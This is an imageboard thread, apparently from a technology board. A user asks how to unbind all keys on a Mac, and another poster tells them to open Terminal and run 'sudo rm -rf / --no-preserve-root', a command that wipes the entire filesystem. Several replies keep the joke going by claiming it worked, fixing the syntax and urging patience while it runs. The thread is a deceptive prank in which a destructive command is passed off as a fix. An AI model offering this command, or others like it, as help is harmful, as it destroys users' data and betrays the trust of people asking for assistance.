I know there's a command for Mac (and I thought Windows) to unbind all keys, what was that /g?
just press these, in order
Command-space
Terminal [enter]
sudo rm -rf / --no-preserve-root
and then your password
Install Gentoo
>>54850002
this
just a lifesaver
>>54850002
thanks..
>>54850002
thanks, worked like a charm
>>54850002
doesnt work
>>54851969 You wrote it wrong.
>>54851969
>>54852027
>and no one heard of him again
>>54849864
>>54852276
Dumb frank poster
>>54852279
Dumb frank posters
ftfy
>>54851969
>using zsh
>implying this poster would fall for it
>>54852027
>>54852276
>know how replace default bash shell with zsh
>dont know what rm command does
u guys actually believe this??
>>54852312
He uses 4chin... he might be that stupid, yes.
>>54851969
rm -rf
not rf -rm
pic not related
>>54852375
thx bro, it works now.. how long do I need to wait... seems broken?? should I ctrl-c and start over
>>54851969
>zsh
what's the point on mac osx? the default login shell has so many of the good zsh features enabled by default
>>54852459
Just wait for a bit, it takes a while to complete.
>>54852486
I'm really intrigued about this command lol, how can it even finish when it tries to delete the system files which are necessary to run it??
>>54852531
The binary file for the command is already in your RAM, so it doesn't matter if you remove it from the hard disk.
>>54852531
It needs to remove old, used too many times files. So you can have the new ones.
>old files
not good for you
>clean and shiny files
good for you
>>54852545
>>54852568
I dont know who is more retared, you guys for trying to bait me, or me actually playing along this stupid game